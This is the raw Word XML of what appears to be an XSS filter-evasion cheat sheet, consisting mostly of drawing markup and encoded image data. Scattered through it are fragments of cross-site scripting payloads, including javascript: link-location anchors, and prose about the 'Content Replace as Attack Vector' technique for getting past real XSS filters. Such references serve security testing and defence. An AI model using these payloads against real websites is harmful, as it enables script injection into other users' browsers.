                <v:shape id="Text Box 499" o:spid="_x0000_s1928" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:352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DOccUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjEWmiq4i0UBCKMR48PrPP&#10;ZDH7Ns1uNf77rlDwOMzMN8xi1dtGXKnzxrGCyTgBQVw6bbhScCg+X99B+ICssXFMCu7kYbUcvCww&#10;0+7GOV33oRIRwj5DBXUIbSalL2uy6MeuJY7e2XUWQ5RdJXWHtwi3jXxLkpm0aDgu1NjSpqbysv+1&#10;CtZHzj/Mz/dpl59zUxRpwtvZRanRsF/PQQTqwzP83/7SCqZ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M5x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7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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId77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http://www.google.com./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"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript Link Location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/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4860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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3850005" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="494" name="Group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0005" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="6063" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="495" name="Freeform 497"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="6063" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7656 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6063"/>
                              <a:gd name="T2" fmla="+- 0 435 252"/>
                              <a:gd name="T3" fmla="*/ 435 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6063"/>
                              <a:gd name="T6" fmla="+- 0 435 252"/>
                              <a:gd name="T7" fmla="*/ 435 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6063"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6063"/>
                              <a:gd name="T14" fmla="+- 0 414 252"/>
                              <a:gd name="T15" fmla="*/ 414 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6063"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6063"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6063"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7656 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6063"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7677 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6063"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7677 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6063"/>
                              <a:gd name="T38" fmla="+- 0 414 252"/>
                              <a:gd name="T39" fmla="*/ 414 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7659 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6063"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7656 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6063"/>
                              <a:gd name="T46" fmla="+- 0 435 252"/>
                              <a:gd name="T47" fmla="*/ 43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063" h="183">
                                <a:moveTo>
                                  <a:pt x="6042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042" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6063" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6063" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6045" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6042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Text Box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2"/>
                            <a:ext cx="606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5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HREF="javascript:document.location='</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId78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http://www.google.com/'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"&gt;XSS&lt;/A&gt;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5" o:spid="_x0000_s1929" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:303.15pt;height:9.15pt;z-index:-15567872;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="6063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">
                <v:shape id="Freeform 497" o:spid="_x0000_s1930" style="position:absolute;left:1614;top:252;width:6063;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6063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fiK8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUUvDMBSF3wX/Q7iCL+LSzVW0LhvdWGGgL05/wKW5&#10;Nt2am5LErvPXG2Hg4+Gc8x3OYjXaTgzkQ+tYwXSSgSCunW65UfD5Ud0/gQgRWWPnmBScKcBqeX21&#10;wEK7E7/TsI+NSBAOBSowMfaFlKE2ZDFMXE+cvC/nLcYkfSO1x1OC207OsuxRWmw5LRjsaWOoPu6/&#10;rYJy/Zr/mPzgqzJs797ma1k9nAelbm/G8gVEpDH+hy/tnVYwf87h70w6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DfiK8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m6042,183l21,183r-3,-1l,162r,-4l,21,21,,6042,r21,21l6063,162r-18,20l6042,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6042,435;21,435;18,434;0,414;0,410;0,273;21,252;6042,252;6063,273;6063,414;6045,434;6042,435" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 496" o:spid="_x0000_s1931" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:6063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9aA8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/KE3nSjlFBTV5GiIBSKMR48vmaf&#10;yWL2bcyumv77rlDwOMzMN8x82dtG3KjzxrGCyTgBQVw6bbhScCg2o3cQPiBrbByTgl/ysFy8DOaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9GPXEkfv5DqLIcqukrrDe4TbRk6TJJUWDceFGlv6rKk8769W&#10;werI+dpcvn92+Sk3RTFL+Cs9K/U67FcfIAL14Rn+b2+1grdZ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H1oD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15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HREF="javascript:document.location='</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId79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http://www.google.com/'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"&gt;XSS&lt;/A&gt;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b/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2901"/>
        </w:tabs>
        <w:spacing w:before="102"/>
        <w:ind w:left="154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485789696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1518920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1226820" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="491" name="Group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6820" cy="116205"/>
                          <a:chOff x="2392" y="108"/>
                          <a:chExt cx="1932" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="492" name="Freeform 494"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2392" y="108"/>
                            <a:ext cx="1932" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4303 2392"/>
                              <a:gd name="T1" fmla="*/ T0 w 1932"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2413 2392"/>
                              <a:gd name="T5" fmla="*/ T4 w 1932"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2410 2392"/>
                              <a:gd name="T9" fmla="*/ T8 w 1932"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2392 2392"/>
                              <a:gd name="T13" fmla="*/ T12 w 1932"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2392 2392"/>
                              <a:gd name="T17" fmla="*/ T16 w 1932"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2392 2392"/>
                              <a:gd name="T21" fmla="*/ T20 w 1932"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2413 2392"/>
                              <a:gd name="T25" fmla="*/ T24 w 1932"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4303 2392"/>
                              <a:gd name="T29" fmla="*/ T28 w 1932"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4324 2392"/>
                              <a:gd name="T33" fmla="*/ T32 w 1932"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4324 2392"/>
                              <a:gd name="T37" fmla="*/ T36 w 1932"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4306 2392"/>
                              <a:gd name="T41" fmla="*/ T40 w 1932"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4303 2392"/>
                              <a:gd name="T45" fmla="*/ T44 w 1932"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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932" h="183">
                                <a:moveTo>
                                  <a:pt x="191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911" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1932" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1932" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1914" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="191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Text Box 493"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2392" y="108"/>
                            <a:ext cx="19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7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hyperlink r:id="rId80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http://www.google.com/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2" o:spid="_x0000_s1932" style="position:absolute;left:0;text-align:left;margin-left:119.6pt;margin-top:5.4pt;width:96.6pt;height:9.15pt;z-index:-17526784;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2392,108" coordsize="193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">
                <v:shape id="Freeform 494" o:spid="_x0000_s1933" style="position:absolute;left:2392;top:108;width:1932;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="193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qqYMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W+g9hCb7XcNITGjRJCIBB6s5NLb4u1&#10;sUytlZFU//Tpq0Igx2FmvmE2u8l2YiAfWscKXrMcBHHtdMuNgsv5+PIOIkRkjZ1jUjBTgN328WGD&#10;hXYjlzRUsREJwqFABSbGvpAy1IYshsz1xMm7Om8xJukbqT2OCW47ucjzlbTYclow2NPBUP1d/VgF&#10;GIe5xC9/fttfZX/45PWvQa3U89O0/wARaYr38K190gqW6wX8n0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qqYMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1911,182l21,182r-3,l,161r,-3l,21,21,,1911,r21,21l1932,161r-18,21l1911,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1911,290;21,290;18,290;0,269;0,266;0,129;21,108;1911,108;1932,129;1932,269;1914,290;1911,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 493" o:spid="_x0000_s1934" type="#_x0000_t202" style="position:absolute;left:2392;top:108;width:193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j5m8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kbTD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aPmb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7"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId81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http://www.google.com/</w:t>
                          </w:r>
                        </w:hyperlink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Assuming</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>programmatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>replaced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nothing).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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actually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si</w:t>
      </w:r>
      <w:r>
        <w:t>milar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="154"/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790720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3949065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>221615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="694690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="490" name="Freeform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" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 7292 6219"/>
                            <a:gd name="T1" fmla="*/ T0 w 1094"/>
                            <a:gd name="T2" fmla="+- 0 531 349"/>
                            <a:gd name="T3" fmla="*/ 531 h 183"/>
                            <a:gd name="T4" fmla="+- 0 6240 6219"/>
                            <a:gd name="T5" fmla="*/ T4 w 1094"/>
                            <a:gd name="T6" fmla="+- 0 531 349"/>
                            <a:gd name="T7" fmla="*/ 531 h 183"/>
                            <a:gd name="T8" fmla="+- 0 6237 6219"/>
                            <a:gd name="T9" fmla="*/ T8 w 1094"/>
                            <a:gd name="T10" fmla="+- 0 530 349"/>
                            <a:gd name="T11" fmla="*/ 530 h 183"/>
                            <a:gd name="T12" fmla="+- 0 6219 6219"/>
                            <a:gd name="T13" fmla="*/ T12 w 1094"/>
                            <a:gd name="T14" fmla="+- 0 510 349"/>
                            <a:gd name="T15" fmla="*/ 510 h 183"/>
                            <a:gd name="T16" fmla="+- 0 6219 6219"/>
                            <a:gd name="T17" fmla="*/ T16 w 1094"/>
                            <a:gd name="T18" fmla="+- 0 506 349"/>
                            <a:gd name="T19" fmla="*/ 506 h 183"/>
                            <a:gd name="T20" fmla="+- 0 6219 6219"/>
                            <a:gd name="T21" fmla="*/ T20 w 1094"/>
                            <a:gd name="T22" fmla="+- 0 370 349"/>
                            <a:gd name="T23" fmla="*/ 370 h 183"/>
                            <a:gd name="T24" fmla="+- 0 6240 6219"/>
                            <a:gd name="T25" fmla="*/ T24 w 1094"/>
                            <a:gd name="T26" fmla="+- 0 349 349"/>
                            <a:gd name="T27" fmla="*/ 349 h 183"/>
                            <a:gd name="T28" fmla="+- 0 7292 6219"/>
                            <a:gd name="T29" fmla="*/ T28 w 1094"/>
                            <a:gd name="T30" fmla="+- 0 349 349"/>
                            <a:gd name="T31" fmla="*/ 349 h 183"/>
                            <a:gd name="T32" fmla="+- 0 7313 6219"/>
                            <a:gd name="T33" fmla="*/ T32 w 1094"/>
                            <a:gd name="T34" fmla="+- 0 370 349"/>
                            <a:gd name="T35" fmla="*/ 370 h 183"/>
                            <a:gd name="T36" fmla="+- 0 7313 6219"/>
                            <a:gd name="T37" fmla="*/ T36 w 1094"/>
                            <a:gd name="T38" fmla="+- 0 510 349"/>
                            <a:gd name="T39" fmla="*/ 510 h 183"/>
                            <a:gd name="T40" fmla="+- 0 7295 6219"/>
                            <a:gd name="T41" fmla="*/ T40 w 1094"/>
                            <a:gd name="T42" fmla="+- 0 530 349"/>
                            <a:gd name="T43" fmla="*/ 530 h 183"/>
                            <a:gd name="T44" fmla="+- 0 7292 6219"/>
                            <a:gd name="T45" fmla="*/ T44 w 1094"/>
                            <a:gd name="T46" fmla="+- 0 531 349"/>
                            <a:gd name="T47" fmla="*/ 531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1094" h="183">
                              <a:moveTo>
                                <a:pt x="1073" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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1073" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1094" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1094" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1076" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1073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894E9" id="Freeform 491" o:spid="_x0000_s1026" style="position:absolute;margin-left:310.95pt;margin-top:17.45pt;width:54.7pt;height:9.15pt;z-index:-175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" path="m1073,182l21,182r-3,-1l,161r,-4l,21,21,,1073,r21,21l1094,161r-18,20l1073,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="681355,337185;13335,337185;11430,336550;0,323850;0,321310;0,234950;13335,221615;681355,221615;694690,234950;694690,323850;683260,336550;681355,337185" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>separate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters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conversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>itself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(here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example)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help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>create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75"/>
        <w:ind w:left="154"/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15892480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2004695</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010920" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="487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0920" cy="116205"/>
                          <a:chOff x="3157" y="81"/>
                          <a:chExt cx="1592" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="488" name="Freeform 490"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3157" y="81"/>
                            <a:ext cx="1592" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4728 3157"/>
                              <a:gd name="T1" fmla="*/ T0 w 1592"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 3179 3157"/>
                              <a:gd name="T5" fmla="*/ T4 w 1592"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 3175 3157"/>
                              <a:gd name="T9" fmla="*/ T8 w 1592"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 3157 3157"/>
                              <a:gd name="T13" fmla="*/ T12 w 1592"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 3157 3157"/>
                              <a:gd name="T17" fmla="*/ T16 w 1592"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 3157 3157"/>
                              <a:gd name="T21" fmla="*/ T20 w 1592"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 3179 3157"/>
                              <a:gd name="T25" fmla="*/ T24 w 1592"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4728 3157"/>
                              <a:gd name="T29" fmla="*/ T28 w 1592"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4749 3157"/>
                              <a:gd name="T33" fmla="*/ T32 w 1592"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4749 3157"/>
                              <a:gd name="T37" fmla="*/ T36 w 1592"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4731 3157"/>
                              <a:gd name="T41" fmla="*/ T40 w 1592"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4728 3157"/>
                              <a:gd name="T45" fmla="*/ T44 w 1592"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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183">
                                <a:moveTo>
                                  <a:pt x="1571" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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2" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1571" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1574" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157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Text Box 489"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3157" y="81"/>
